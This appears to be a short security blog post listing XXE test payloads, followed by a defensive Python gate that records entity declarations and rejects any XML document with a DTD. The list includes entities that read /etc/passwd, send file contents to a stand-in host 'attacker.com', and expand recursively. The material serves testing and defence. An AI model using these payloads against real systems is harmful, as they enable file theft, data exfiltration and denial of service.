Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE:

- Basic payload: `<!DOCTYPE replace [<!ENTITY example "Hello World">]>`
- Retrieving sensitive files: `<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>`
- Retrieving files via FTP: `<!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]>`
- Retrieving files via HTTP: `<!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]>`
- Sending data to a remote server: `<!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]>`
- Recursive payload: `<!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]>`
- ...
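The defender-side counterpart to these payloads, added here as an example and not part of the original post: a pre-parse gate that records what a document's DOCTYPE declares (internal, SYSTEM and parameter entities) without resolving anything, then refuses any document that carries a DTD at all. The sample documents are constructed from the post's DOCTYPEs plus a `<replace>` root element; `inspect_dtd` and `parse_untrusted` are names chosen for this example.

```python
"""Added example: a pre-parse gate that inspects what a document's DOCTYPE
declares, never resolving anything, and rejects any document carrying a DTD."""
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


def inspect_dtd(document: str) -> dict:
    """Record internal, external (SYSTEM) and parameter entity declarations."""
    found = {"doctype": False, "internal": {}, "external": {}, "parameter": []}
    parser = expat.ParserCreate()
    # Never read an external DTD subset or expand parameter entities here.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        found["doctype"] = True
        if sysid:  # <!DOCTYPE x SYSTEM "..."> points at an external DTD
            found["external"]["<!DOCTYPE>"] = sysid

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:
            found["external"][name] = sysid
        elif is_param:
            found["parameter"].append(name)
        else:  # value is stored unexpanded, e.g. "Hello &example2;"
            found["internal"][name] = value

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # A body reference to an external entity is acknowledged, never fetched.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 1
    try:
        parser.Parse(document, True)
    except expat.ExpatError:
        pass  # e.g. recursive entity reference; declarations are already recorded
    return found


def parse_untrusted(document: str) -> ET.Element:
    """Blanket mitigation: refuse any DTD, otherwise parse with ElementTree."""
    found = inspect_dtd(document)
    if found["doctype"]:
        raise ValueError(f"DTD not allowed: external={found['external']} "
                         f"internal={sorted(found['internal'])}")
    return ET.fromstring(document)


# Constructed samples: the post's DOCTYPE payloads plus a <replace> root.
BODY = "<replace>&example;</replace>"
SAMPLES = {
    "basic": '<!DOCTYPE replace [<!ENTITY example "Hello World">]>' + BODY,
    "file": '<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>' + BODY,
    "recursive": ('<!DOCTYPE replace [<!ENTITY example "Hello &example2;">'
                  '<!ENTITY example2 "&example;&example;&example;">]>' + BODY),
}
```

Logging the `found` dictionary on rejection gives a detection record (which entity names and SYSTEM URIs were attempted) rather than a bare parse failure.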

March 14, 2023 · 1 min · chs